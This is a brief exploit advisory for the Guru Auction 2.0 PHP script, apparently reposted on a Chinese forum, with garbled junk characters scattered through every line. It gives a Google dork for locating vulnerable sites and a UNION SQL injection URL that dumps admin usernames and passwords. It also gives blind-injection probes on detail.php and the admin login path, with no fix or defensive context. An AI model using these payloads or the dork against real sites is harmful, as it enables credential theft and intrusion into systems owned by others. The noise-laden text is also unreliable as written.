Guru Auction 2.0 Multiple SQL Injection Vulnerabilities* @5 Z+ ]/ w- l/ V" m, Q0 J+ x8 X
4 ?" E( h2 Q& ]% G3 X" ~作者 : v3n0m
, h; c! m" ?5 D, q- {8 z应用 : Guru Auction 2.0
/ B# x# @# p5 k6 _/ ]4 B' JPrice : $49& ? j$ c% ^& n9 R( R) r
Vendor : http://www.guruscript.com/; Q- x% w1 ^" C. J
Google Dork : inurl:subcat.php?cate_id=
7 C5 B7 }, p; @! n$ I2 G
7 g, T* h: n! ?- m& TSQLi p0c:
3 U" ]) [- {+ {/ v~~~~~~~~~~2 L. N" i: V$ M# w/ ~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
) }* i8 T% D% K2 _5 p8 l
7 M* d0 l' x* c5 l7 Q# m
0 ?+ R1 c2 `5 ]3 \7 I, u盲注 p0c:
8 `% E' b* d# Y! i! k. y~~~~~~~~~~
* G0 X9 U" }8 S& a* Y% _5 W1 M4 Dhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
5 v8 b! R& ]8 ^" K8 ghttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
/ h" o, m; r) o2 r6 H
$ ^& m8 E' O4 O管理登录入口:
7 b2 L2 N& H; J* h& ^1 N+ V7 p~~~~~~~~~~
. S% f# K' j, I4 i9 Ehttp://domain.tld/[path]/admin/* l) U2 l: ~& M8 f$ E4 {( Q
|